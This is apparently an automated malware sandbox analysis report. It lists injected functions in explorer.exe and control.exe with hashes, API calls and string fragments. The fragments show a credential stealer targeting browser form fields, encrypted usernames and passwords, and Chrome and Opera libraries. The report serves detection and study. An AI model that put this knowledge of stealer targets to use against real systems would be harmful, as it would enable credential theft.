SleepEx.KERNEL32 ref: 0F97A32D

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 2e3fb0a1afb92de1fe933748919d907caccf3b637901e6adb02cdf516deace38
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 2A317C70614B09DFDB64EF2980882E9B7A1FB84301F84467EC92DCB197CB38A490CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0F97A412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0F97A461

Memory Dump Source

Source File: 00000006.00000002.4110593257.000000000F960000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f960000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 932bcdef1da69fe939089636cba98a197f3d268420482c3107572b2fe046a2de
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: F0F0C230268B484FDB88EF2CD44563AB3D0EBE9214F45063EA54DC3265DA29D9824716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F381D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 0F381F13
32.d, xrefs: 0F381F0B
kern, xrefs: 0F381F5A
el32, xrefs: 0F381F27
user, xrefs: 0F381F03
S, xrefs: 0F382073
dll, xrefs: 0F381F4C
wini, xrefs: 0F381F72
.dll, xrefs: 0F381F2F
M, xrefs: 0F382082
net., xrefs: 0F381F44

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 48bded458668d95ac3a0729b927ec27d40fb3d2c9d6597559f0844948345d597
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: CEE15A74518F488FCB64EF68C4847ABB7E0FB58310F904A2E959BC7252DF38A546CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F384792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

swor, xrefs: 0F3848EA
Fiel, xrefs: 0F384884
user, xrefs: 0F384876
ypte, xrefs: 0F3848A5
e, xrefs: 0F3848BD
itUR, xrefs: 0F38485D
dPas, xrefs: 0F3848E2
rnam, xrefs: 0F3848B5
encr, xrefs: 0F3848D2
d, xrefs: 0F3848F2
Subm, xrefs: 0F384855
name, xrefs: 0F38487D
dUse, xrefs: 0F3848AD
ypte, xrefs: 0F3848DA
encr, xrefs: 0F38489D
guid, xrefs: 0F3847CE
form, xrefs: 0F38484D

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: fa4684fb5d71fe5b2226b4be6718d413d5d69b55418265f84bd0e4642ab6a499
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: F9B1AC70518B488ECB19EF68C485AEEB7F1FF98340F40451ED49AC7252EF789406CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0F382622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

t, xrefs: 0F3826C8
d, xrefs: 0F3826A5
d, xrefs: 0F3826CF
2, xrefs: 0F382674
l, xrefs: 0F3826AC
l, xrefs: 0F382682
i, xrefs: 0F38269E
s, xrefs: 0F382689
p, xrefs: 0F382690
l, xrefs: 0F3826D6
n, xrefs: 0F3826C1
c, xrefs: 0F382697
n, xrefs: 0F3826BA
d, xrefs: 0F38267B
e, xrefs: 0F38266D
u, xrefs: 0F382661
w, xrefs: 0F3826B3

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: de253bd2a5d80ef6b47c688f168bb00e62f5672b2a646715bff5954d9e80fb7f
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: E041B670A18B088FDB18EF88A4556BE7BF2FB48710F40025ED409D3246DBB9DD468BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0F389AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

l, xrefs: 0F389CE2
], xrefs: 0F389CA8
l, xrefs: 0F389C35
D, xrefs: 0F389CDA
b, xrefs: 0F389C73
c, xrefs: 0F389C0B
[, xrefs: 0F389C90
[, xrefs: 0F389C66
], xrefs: 0F389C3D
n, xrefs: 0F389C98
[, xrefs: 0F389BF6
e, xrefs: 0F389CA0
[, xrefs: 0F389C2D
[, xrefs: 0F389CCD

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 2e8e7dba2f21178d065ab591cc1cffea877650829429f648a8212505d4612b39
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 63C15A70218B099FC758FF68C485AEAF7E1FB94314F50472E949AC7211DF38A616CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0F389F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

0, xrefs: 0F389F5B
r, xrefs: 0F389FA0
r, xrefs: 0F389F90
r, xrefs: 0F389FB0
n, xrefs: 0F389F6B
r, xrefs: 0F389FA8
r, xrefs: 0F389FC0
c, xrefs: 0F389FC8
r, xrefs: 0F389F98
r, xrefs: 0F389F88
r, xrefs: 0F389FB8
., xrefs: 0F389F63

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: f1f6845f1665a5d3c9c8a00130d3bae5e53b7cb3e6635fd6e9ff863a89f88dc9
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: A551D7711187488FDB19EF14C4812AAB7E5FBC5710F501A2EE8CBC7252DBBC9906CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0F3832F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0F383629
4.dl, xrefs: 0F3834DB
nspr, xrefs: 0F3834D4
dll, xrefs: 0F38332E
sspi, xrefs: 0F383320
dragon_s.dll, xrefs: 0F383614
cli., xrefs: 0F383327
l, xrefs: 0F3834E2

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: bcb9ae07f63d5a7c1065b80254e8aa7de9b5f3ed3feb1bda3561628cbe4349d6
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 3AC19170618B198FC758FF68D495AEAF3E1FB94310F914329944EC7252DF38AA0687C5

Uniqueness

Uniqueness Score: -1.00%

Function 0F3832F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0F383629
4.dl, xrefs: 0F3834DB
nspr, xrefs: 0F3834D4
dll, xrefs: 0F38332E
sspi, xrefs: 0F383320
dragon_s.dll, xrefs: 0F383614
cli., xrefs: 0F383327
l, xrefs: 0F3834E2

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 38a918a9834f8754c1e02fd8cfd101de648df1fc5d35ac4d765f499f4b1e20ae
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 98C19170618B198FCB58FF68D495AEAF3E1FB94310F914329844AC7252DF38AA0687C5

Uniqueness

Uniqueness Score: -1.00%

Function 0F384CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 0F384D9E
UR, xrefs: 0F384D5F
L: , xrefs: 0F384D66
name, xrefs: 0F384DB2
2, xrefs: 0F384DE1
User, xrefs: 0F384DAB
Pass, xrefs: 0F384D97

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: ffa2e7ce66d59526eccac448c258bf5dad1a68e0884bcfec2c00dfabdf74f9c7
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: F7A1D2706187488FDB19EFA8D444BEEB7E1FF84350F40462DE48AD7242EF7895468789

Uniqueness

Uniqueness Score: -1.00%

Function 0F384CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 0F384D9E
UR, xrefs: 0F384D5F
L: , xrefs: 0F384D66
name, xrefs: 0F384DB2
2, xrefs: 0F384DE1
User, xrefs: 0F384DAB
Pass, xrefs: 0F384D97

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 32cb9f09a463d403d3043bcdbbbba61dfbbbc73fa6d4dbb594b443a17130c287
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 9B91B0706187488FDB19EFA8D444BEEB7E1FF88350F40462EE48AD7242EF7895468785

Uniqueness

Uniqueness Score: -1.00%

Function 0F384352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

n, xrefs: 0F3843E7
e, xrefs: 0F38448E
., xrefs: 0F3843B0
v, xrefs: 0F3844A0
, xrefs: 0F38447C

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: f809e3867de03f420df4290dd5e58b7b65f4437e7c44b73e667b46c62f74b6ca
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 057194316187498FD758EF68C4847AEB7F1FF94314F00062ED44AC7222EB79D9468B85

Uniqueness

Uniqueness Score: -1.00%

Function 0F37FC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

shel, xrefs: 0F37FC90
2.dl, xrefs: 0F37FC64
ole3, xrefs: 0F37FC5D
l32., xrefs: 0F37FC97
dll, xrefs: 0F37FC9E

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 5034442b5702855ba4d775819e59bf335c9bf882bdb74a54b0f9110c59e6a6be
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 585159B0918B4D8BDB64EFA4C044AEEB7F1FF58300F40462ED59AE7215EF3496458B89

Uniqueness

Uniqueness Score: -1.00%

Function 0F38086F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

vers, xrefs: 0F3808E4
\, xrefs: 0F3809E0
4, xrefs: 0F3809E9
dll, xrefs: 0F3808F4
ion., xrefs: 0F3808EC

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 20017677d9ca7f05a1e2ec2cf30535b908105faf77078c77a8e8414666c46b79
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: D1415431219B4C8BCB69FF24D8457EAB3E4FB94311F40462E945EC7241DF38D5468782

Uniqueness

Uniqueness Score: -1.00%

Function 0F3824B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

dll, xrefs: 0F38251C
sspi, xrefs: 0F38250E
cli., xrefs: 0F382515
user, xrefs: 0F3824D3
32.d, xrefs: 0F3824DA

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 9b3b13c7f651d033cf299c114aa41e446b3ac2ead28433e8f50fd4c462689b39
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 37415170A58F0D8FCB54FF68C0A57AEB7E1FB58310F80456A980ED7212DA78D5428BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0F380432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 0F38051F
.dll, xrefs: 0F38053F
el32, xrefs: 0F380537
kern, xrefs: 0F38052A

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 3af8d17428d562c88f0522da0583028586222887147737df9321b6b45ac38e12
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 034161B060CB488FD7A9EF28C4943AAB7E1FB98310F504A2F949EC3256DB74D546CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0F3870B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0F38713D
, xrefs: 0F387184
Snif, xrefs: 0F387154
om:, xrefs: 0F387146

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 8cf9b1a36609d2aa8508c6045eccc1155447b174718ef2742079064f08f7e046
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 2931047151CB886FC71AEF28C4846DAB7D4FB84310F50491EE49BC7252EE38A54ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 0F3870C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0F38713D
, xrefs: 0F387184
Snif, xrefs: 0F387154
om:, xrefs: 0F387146

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 69f098478c4fadb1d47a5561dc310b43405b62fdcf2afd3df04f183f80f54077
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: D031E171518B486FD71AEF28C484AEAB7D5FB94310F50491EE49BC3252EE38E50BCB42

Uniqueness

Uniqueness Score: -1.00%

Function 0F382FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 0F383023
me_c, xrefs: 0F382FEE
hild, xrefs: 0F382FF6
.dll, xrefs: 0F382FFE

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 11c4be30dc954857e49538a9376fa2286f638d741e3662e7909f9079127f5287
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: EC317E70118B488FCB84FF288495BAAB7E1FBD8310F94462D944ECB256DF38D946C792

Uniqueness

Uniqueness Score: -1.00%

Function 0F382FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 0F383023
me_c, xrefs: 0F382FEE
hild, xrefs: 0F382FF6
.dll, xrefs: 0F382FFE

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 35f64f73b9a6d53f44b1dd671b44fd1a402f3685425dacdda698f6045cb57058
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: BC318F70118B488FCB94FF288494BAAB7E1FFD8310F94462D944ACB256DF38C506C792

Uniqueness

Uniqueness Score: -1.00%

Function 0F3858C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0F385935, 0F385948
on.d, xrefs: 0F385902
urlmon.dll, xrefs: 0F385959
nt: , xrefs: 0F38591E

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: fe8c9e061bc7f28e39a3c717ba5703681ccfdf07968dd2c07fae0e1f3a2c1797
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 7C31CE71614B4C8BCB44FFA8C8847EEB7E1FB58224F40022AD44ED7241DF7C864A8799

Uniqueness

Uniqueness Score: -1.00%

Function 0F3858BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0F385935, 0F385948
on.d, xrefs: 0F385902
urlmon.dll, xrefs: 0F385959
nt: , xrefs: 0F38591E

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 492cf33d55887f0c921d5318070cc77290692c05560913af418ed19cc48d6bf7
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 6F21E170610B4C8BCB44FFA8C8847EDBBA1FF58264F40022AD45AD7241DF7C86068B99

Uniqueness

Uniqueness Score: -1.00%

Function 0F386E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F386F03
t, xrefs: 0F386EF4
l, xrefs: 0F386F26
., xrefs: 0F386F1F

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 0c4a0c6da9ed52ca42088e0c154d1e1408fc9d4f185200114afd9dd6996e8875
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 87216870A24B0E9BDB08FFA8D0447AEBBF0FB58314F50562ED009D3601DB7C95968B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F386E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F386F03
t, xrefs: 0F386EF4
l, xrefs: 0F386F26
., xrefs: 0F386F1F

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 5b8753378eb46ab8fe10b60da6f48a4a284522692e4ed0a97962094ee7e04b69
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 4B216870A24B0D9BDB08FFA8D0447EABBF0FB18314F50562ED009D3601DB7C95568B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F386FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 0F38702F
user, xrefs: 0F387015
pass, xrefs: 0F387022
logi, xrefs: 0F38703C

Memory Dump Source

Source File: 00000006.00000002.4109806888.000000000F330000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f330000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 25c6d7b3fd08ff0928b1048bff51d9585c7c63309cbe0767162ab3bb8e4182cc
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 9121C070614B0D8BCF05EF9998906EEB7E1EF88354F005619D40AEB345D7B8E9158BD2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exePID: 7956, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	598
Total number of Limit Nodes:	75

Executed Functions

Function 00CDA350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00CD4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00CD4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00CDA39D

Strings

.z`, xrefs: 00CDA38D, 00CDA398

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: fafde7631d05b1155423cdce4ad86247cb935fa81d0dd2783802fde90741d485
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 28F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00CD4D62,5EB65239,FFFFFFFF,00CD4A21,?,?,00CD4D62,?,00CD4A21,FFFFFFFF,5EB65239,00CD4D62,?,00000000), ref: 00CDA445

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
